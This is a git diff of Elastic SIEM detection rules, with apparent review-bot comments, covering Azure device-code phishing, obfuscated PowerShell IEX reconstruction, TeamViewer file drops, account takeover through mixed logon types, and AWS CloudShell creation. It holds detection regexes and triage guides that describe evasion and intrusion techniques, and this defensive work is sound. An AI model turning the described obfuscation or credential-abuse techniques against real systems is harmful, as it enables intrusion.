"https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + }, + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 8 + }, + "id": "af22d970-7106-45b4-b5e3-460d15333727_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b0c98cfb-0745-4513-b6f9-08dddb033490_7.json b/packages/security_detection_engine/kibana/security_rule/b0c98cfb-0745-4513-b6f9-08dddb033490_7.json deleted file mode 100644 index cc29b3fb38b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/b0c98cfb-0745-4513-b6f9-08dddb033490_7.json +++ /dev/null 
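Review bot: The `azure.activitylogs` branch of the query looks unreachable: every match must also satisfy `azure.signinlogs.properties.user_type:*`, and `new_terms_fields` contains only `azure.signinlogs.properties.user_principal_name`, so an activitylogs document (which presumably carries `azure.activitylogs.*` rather than `azure.signinlogs.*` fields) is dropped by the existence filter and, even if it passed, has no new-terms value to key on. Either remove `logs-azure.activitylogs-*` and the `azure.activitylogs.properties.authentication_protocol:deviceCode` clause, or move the `user_type:*` check into the signinlogs branch and add an activitylogs principal field to `new_terms_fields`. Separately, the nine excluded `app_id` GUIDs are not explained anywhere in `note` or the false-positive section; each should be named and justified so a reviewer can confirm none of them is a client a device-code phishing kit can request a code for, since an over-broad allow-list here silently blinds the rule. Finally, `history_window_start` of `now-7d` means a user who last used device code eight days ago re-alerts as "new", which is narrower than the "first time" wording in `description`; consider a longer window or adjust the wording.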
@@ -1,178 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that reconstruct the IEX (Invoke-Expression) command at runtime using indexed slices of environment variables. This technique leverages character access and join operations to build execution logic dynamically, bypassing static keyword detection and evading defenses such as AMSI.", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential Dynamic IEX Reconstruction via Environment Variables", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Dynamic IEX Reconstruction via Environment Variables\n\nPowerShell's Invoke-Expression (IEX) command is a powerful tool for executing strings as code, often exploited by attackers to run obfuscated scripts. Adversaries may dynamically reconstruct IEX using environment variables to evade static detection. The detection rule identifies scripts that manipulate environment variables to form IEX commands, focusing on patterns of character slicing and joining, which are indicative of obfuscation techniques. 
By analyzing script length and specific patterns, the rule effectively flags potential misuse, aiding in defense against such evasion tactics.\n\n### Possible investigation steps\n\n- Review the powershell.file.script_block_text field to understand the content and intent of the script, focusing on how environment variables are manipulated to reconstruct the IEX command.\n- Examine the file.path and host.name fields to determine the origin and location of the script execution, which can provide context on whether the activity is expected or suspicious.\n- Analyze the user.id and agent.id fields to identify the user and agent responsible for executing the script, checking for any anomalies or unauthorized access.\n- Investigate the powershell.file.script_block_id and powershell.sequence fields to trace the execution sequence and correlate it with other related PowerShell activities on the host.\n- Assess the count field to understand the extent of obfuscation patterns detected, which can indicate the complexity and potential maliciousness of the script.\n\n### False positive analysis\n\n- Scripts with legitimate use of environment variables for configuration management may trigger the rule. Users can create exceptions for specific scripts or processes known to use environment variables in a non-threatening manner.\n- Automated scripts that dynamically construct commands for legitimate administrative tasks might be flagged. Review the script's purpose and source, and whitelist trusted scripts or processes.\n- Development environments where scripts are frequently tested and modified may produce false positives. Implement monitoring exclusions for development machines or specific user accounts involved in script testing.\n- Scripts using environment variables for localization or language settings can be mistakenly identified. 
Identify and exclude scripts that are part of standard localization processes.\n- PowerShell scripts from trusted vendors or software packages that use environment variables for legitimate functionality should be reviewed and excluded from detection if verified as safe.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further execution of potentially malicious scripts and limit lateral movement.\n- Terminate any suspicious PowerShell processes identified by the alert to stop ongoing malicious activity.\n- Review the PowerShell script block text and associated file paths to understand the scope and intent of the script, focusing on any obfuscated commands or environment variable manipulations.\n- Restore the system from a known good backup if malicious activity is confirmed and system integrity is compromised.\n- Update endpoint protection and intrusion detection systems to recognize and block similar obfuscation patterns in PowerShell scripts.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n- Implement additional monitoring for unusual PowerShell activity and environment variable manipulations to enhance detection of similar threats in the future.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n 
\"\"\"(?i)(\\$(?:\\w+|\\w+\\:\\w+)\\[\\d++\\]\\+\\$(?:\\w+|\\w+\\:\\w+)\\[\\d++\\]\\+['\"]x['\"]|\\$(?:\\w+\\:\\w+)\\[\\d++,\\d++,\\d++\\]|\\.name\\[\\d++,\\d++,\\d++\\])\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": 
"powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "b0c98cfb-0745-4513-b6f9-08dddb033490", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": 
[ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 7 - }, - "id": "b0c98cfb-0745-4513-b6f9-08dddb033490_7", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_217.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_217.json new file mode 100644 index 00000000000..a0117770fa5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_217.json 
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an executable or script file remotely downloaded via a TeamViewer transfer session.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Copy via TeamViewer", + "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"cmd\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"jse\", \"wsh\", \"wsf\", \"sct\", \"hta\") and\n not \n (\n file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\*.js\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\TeamViewer\\\\update.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\?\\\\TeamViewer\\\\update.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\TeamViewer\\\\CustomConfigs\\\\???????\\\\TeamViewer_Resource_??.dll\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\TeamViewer\\\\CustomConfigs\\\\???????\\\\TeamViewer*.exe\"\n ) and process.code_signature.trusted == true\n )\n", + "references": [ + "http://web.archive.org/web/20230329160957/https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", + "severity": "medium", + "tags": [ + 
"Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: SentinelOne" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + }, + { + "id": "T1219", + "name": "Remote Access Tools", + "reference": "https://attack.mitre.org/techniques/T1219/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 217 + }, + "id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee_217", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-f6a7-5b6c-9d0e-1f2a3b4c5d6e_2.json b/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-f6a7-5b6c-9d0e-1f2a3b4c5d6e_2.json new file mode 100644 index 00000000000..cf21d26c6c7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-f6a7-5b6c-9d0e-1f2a3b4c5d6e_2.json 
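Review bot: The exclusion in `query` gates the `file.path` allow-list on `process.code_signature.trusted == true` alone, with no `process.code_signature.subject_name` check, so any trusted-signed binary running as `TeamViewer.exe` is exempted for those paths; the ab75c24b rule earlier in this diff lists both `trusted` and `subject_name` as required fields, and pairing them here would tighten the exemption, e.g. `) and process.code_signature.trusted == true and process.code_signature.subject_name : "TeamViewer*"` (confirm the signer subject against a real TeamViewer binary before committing to that prefix). Note also that the rule now reads `logs-sentinel_one_cloud_funnel.*`; if that source does not populate `process.code_signature.trusted`, the `not (...)` clause never suppresses anything for SentinelOne events and the `update.exe`/`CustomConfigs` paths will alert there, which is worth confirming or stating in the false-positive section. The `INetCache\\*.js` entry is also broader than the other exclusions (any `.js` anywhere under INetCache) and deserves a sentence in `note` explaining why it is safe to exempt.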
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a user account (often a service account) that normally logs in with high volume using one logon type suddenly showing successful logons using a different logon type with low count. This pattern may indicate account takeover or use of stolen credentials from a new context (e.g. interactive or network logon where only batch/service was expected).", + "from": "now-15m", + "interval": "14m", + "language": "esql", + "license": "Elastic License v2", + "name": "Potential Account Takeover - Mixed Logon Types", + "note": "## Triage and analysis\n\n### Investigating Potential Account Takeover - Mixed Logon Types\n\nA high-volume account (e.g. service account tied to a specific logon type such as Batch or Network) that also shows successful logons with a different logon type and low count may indicate credential compromise and use from a new context (account takeover or misuse).\n\n### Possible investigation steps\n\n- Confirm with the account owner or service owner whether the additional logon type is expected (e.g. new automation, RDP for maintenance).\n- Review which logon types appear in Esql.logon_type_values and which has the low count (likely the anomalous one).\n- Correlate with other alerts for the same user (e.g. logon from new source IP, password changes, MFA changes).\n- Check whether the account is a known service account; if so, verify if any new scripts or systems were authorized to use it.\n\n### False positive analysis\n\n- Legitimate expansion of use (e.g. service account also used for occasional interactive logon for troubleshooting) can trigger this. Tune thresholds (e.g. 
max_logon >= 1000, min_logon <= 10) or add exclusions for known service accounts with documented multi-context use.\n- New scheduled tasks or automation that use a different logon type may cause a short-lived spike in the \"other\" logon type; review over a longer window if needed.\n\n### Response and remediation\n\n- If takeover or misuse is confirmed: force password reset, revoke sessions, rotate service account credentials, and restrict logon type or source where possible.\n- Investigate how credentials may have been compromised and address the vector.\n", + "query": "from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index\n| WHERE event.category == \"authentication\" and event.action == \"logged-in\" and winlog.event_id == \"4624\" and\n event.outcome == \"success\" and not user.id in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n to_lower(user.name) != \"administrator\"\n| STATS logon_count = COUNT(*), host_names = VALUES(host.name) by user.name, user.id, winlog.logon.type\n| STATS\n Esql.max_logon = MAX(logon_count),\n Esql.min_logon = MIN(logon_count),\n Esql.unique_host_count = COUNT_DISTINCT(host_names),\n Esql.host_name_values = VALUES(host_names),\n Esql.logon_type_values = VALUES(winlog.logon.type),\n Esql.count_distinct_logon_types = COUNT_DISTINCT(winlog.logon.type) by user.name, user.id\n\n// high count of logons is often associated with service account tied to a specific service, if observed in use with a different logon type it's suspicious\n| WHERE Esql.count_distinct_logon_types >= 2 and Esql.max_logon >= 1000 and (Esql.min_logon >= 1 and Esql.min_logon <= 10) and Esql.unique_host_count >= 2\n| EVAL winlog.logon.type = MV_FIRST(Esql.logon_type_values), host.name = MV_FIRST(Esql.host_name_values)\n| KEEP user.name, user.id, host.name, winlog.logon.type, Esql.*\n", + "references": [ + "https://attack.mitre.org/techniques/T1078/" + ], + "related_integrations": [ + { + "package": "system", + "version": 
"^2.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.count_distinct_logon_types", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.host_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.logon_type_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.max_logon", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.min_logon", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.unique_host_count", + "type": "long" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b2c3d4e5-f6a7-5b6c-9d0e-1f2a3b4c5d6e", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 2 + }, + "id": "b2c3d4e5-f6a7-5b6c-9d0e-1f2a3b4c5d6e_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b625c9ad-16e5-4f16-8d38-3e9631952554_1.json b/packages/security_detection_engine/kibana/security_rule/b625c9ad-16e5-4f16-8d38-3e9631952554_1.json new file mode 100644 index 00000000000..e2877c9649b --- /dev/null 
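Review bot: The first `WHERE` excludes the three built-in service SIDs and `administrator` but not computer accounts, whose names end in `$` and which typically produce exactly the high-volume logon pattern this rule keys on (`Esql.max_logon >= 1000`), so a domain member that also records a handful of logons of a second type would alert; adding `and not ENDS_WITH(user.name, "$")` to that clause (or a documented reason to keep machine accounts) would narrow it to the user and service accounts `description` targets. `Esql.min_logon >= 1` in the final `WHERE` is redundant, since a `COUNT(*)` group is never below 1, and can be dropped. The `EVAL winlog.logon.type = MV_FIRST(Esql.logon_type_values)` surfaces an arbitrary member of the set rather than the low-count (suspicious) type, so `note` should say explicitly that `winlog.logon.type` on the alert is not necessarily the anomalous one and that `Esql.logon_type_values` must be consulted. The 15-minute `from` window combined with `max_logon >= 1000` also implies roughly one logon per second before an account is even considered; that rate is worth a line in `note` so operators understand why lower-volume service accounts never fire.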
+++ b/packages/security_detection_engine/kibana/security_rule/b625c9ad-16e5-4f16-8d38-3e9631952554_1.json 
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a new AWS CloudShell environment. CloudShell is a browser-based shell that provides command-line access to AWS resources directly from the AWS Management Console. The CreateEnvironment API is called when a user launches CloudShell for the first time or when accessing CloudShell in a new AWS region. Adversaries with console access may use CloudShell to execute commands, install tools, or interact with AWS services without needing local CLI credentials. Monitoring environment creation helps detect unauthorized CloudShell usage from compromised console sessions.", + "false_positives": [ + "Legitimate use of CloudShell by administrators for routine AWS management tasks. Verify whether the user has a legitimate need for CloudShell access and correlate with recent console login activity. Environment creation also occurs when users access CloudShell in a new AWS region." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS CloudShell Environment Created", + "note": "## Triage and analysis\n\n### Investigating AWS CloudShell Environment Created\n\nAWS CloudShell is a browser-based shell environment that provides instant command-line access to AWS resources without requiring local CLI installation or credential configuration. 
While this is convenient for legitimate administrators, it also provides adversaries with a powerful tool if they gain access to a compromised AWS console session.\n\nThis rule detects when a CloudShell environment is created via the `CreateEnvironment` API. This event occurs when a user launches CloudShell for the first time or when accessing CloudShell in a new AWS region (each region maintains a separate environment). \n\n### Possible investigation steps\n\n- **Identify the actor**\n - Review `aws.cloudtrail.user_identity.arn` or `user.name` to determine which IAM principal created the CloudShell environment.\n - Check `aws.cloudtrail.user_identity.type` to identify whether this is an IAM user or an assumed role session.\n - Verify if this user typically performs command-line or administrative operations.\n\n- **Analyze the source context**\n - Review `source.ip` and `source.geo` fields to verify the request origin matches expected administrator locations.\n - Check `user_agent.original` to confirm the request came from a browser session.\n - Look for the preceding `ConsoleLogin` event to understand how the session was established.\n\n- **Correlate with surrounding activity**\n - Look for any IAM operations (CreateAccessKey, CreateUser, AttachRolePolicy) that occurred after CloudShell was accessed.\n - Check for data exfiltration patterns or reconnaissance activity from the same session.\n\n- **Assess the broader context**\n - Determine if this user has a legitimate need for CloudShell access based on their role.\n - Review recent access patterns for the console session that initiated CloudShell.\n - Check if MFA was used for the console login.\n\n### False positive analysis\n\n- Administrators routinely using CloudShell for AWS management tasks will trigger this rule. 
Consider tuning for known admin users if noise is a concern.\n- Users accessing CloudShell in a new AWS region will generate a `CreateEnvironment` event even if they have used CloudShell before in other regions.\n- Training or certification activities may involve CloudShell environment creation.\n\n### Response and remediation\n\n- If unauthorized, immediately terminate the console session to revoke CloudShell access.\n- Review and revoke any credentials or resources created during the CloudShell session.\n- Consider restricting CloudShell access via SCPs or IAM policies for sensitive accounts or users who do not require it.\n- Implement session duration limits to reduce the window of opportunity for console session abuse.\n- Enable MFA for all console logins to reduce the risk of session compromise.\n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/)**\n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)** \n", + "query": "event.dataset: \"aws.cloudtrail\"\n and event.provider: \"cloudshell.amazonaws.com\"\n and event.action: \"CreateEnvironment\"\n and event.outcome: \"success\"\n", + "references": [ + "https://aws-samples.github.io/threat-technique-catalog-for-aws/Techniques/T1059.009.html", + "https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "b625c9ad-16e5-4f16-8d38-3e9631952554", + "severity": "low", + "tags": [ 
+ "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS CloudTrail", + "Data Source: AWS CloudShell", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.009", + "name": "Cloud API", + "reference": "https://attack.mitre.org/techniques/T1059/009/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "b625c9ad-16e5-4f16-8d38-3e9631952554_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_113.json b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_113.json new file mode 100644 index 00000000000..cc70482b862 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_113.json 
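Review bot: The query's `event.outcome: "success"` clause limits this rule to environments that were actually created, so a `CreateEnvironment` call denied by an SCP or IAM policy — the very control the Response section recommends — never fires it; the description or the investigation guide should state that failed attempts are out of scope so analysts do not assume coverage. The file also has no `setup` string, unlike the sibling o365 rule on this page; suggest `"setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule."` placed before `"severity"` to keep the alphabetical key order. The guide's source-context step tells the analyst to review `source.geo` fields, but `investigation_fields.field_names` lists only `source.ip`; add the geo field the integration populates (presumably `source.geo.country_name` — confirm against the cloudtrail pipeline) or drop the reference. Two markdown lines inside `note` end with a trailing space before `\n` (`separate environment). \n` and `docs)** \n`); remove them.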
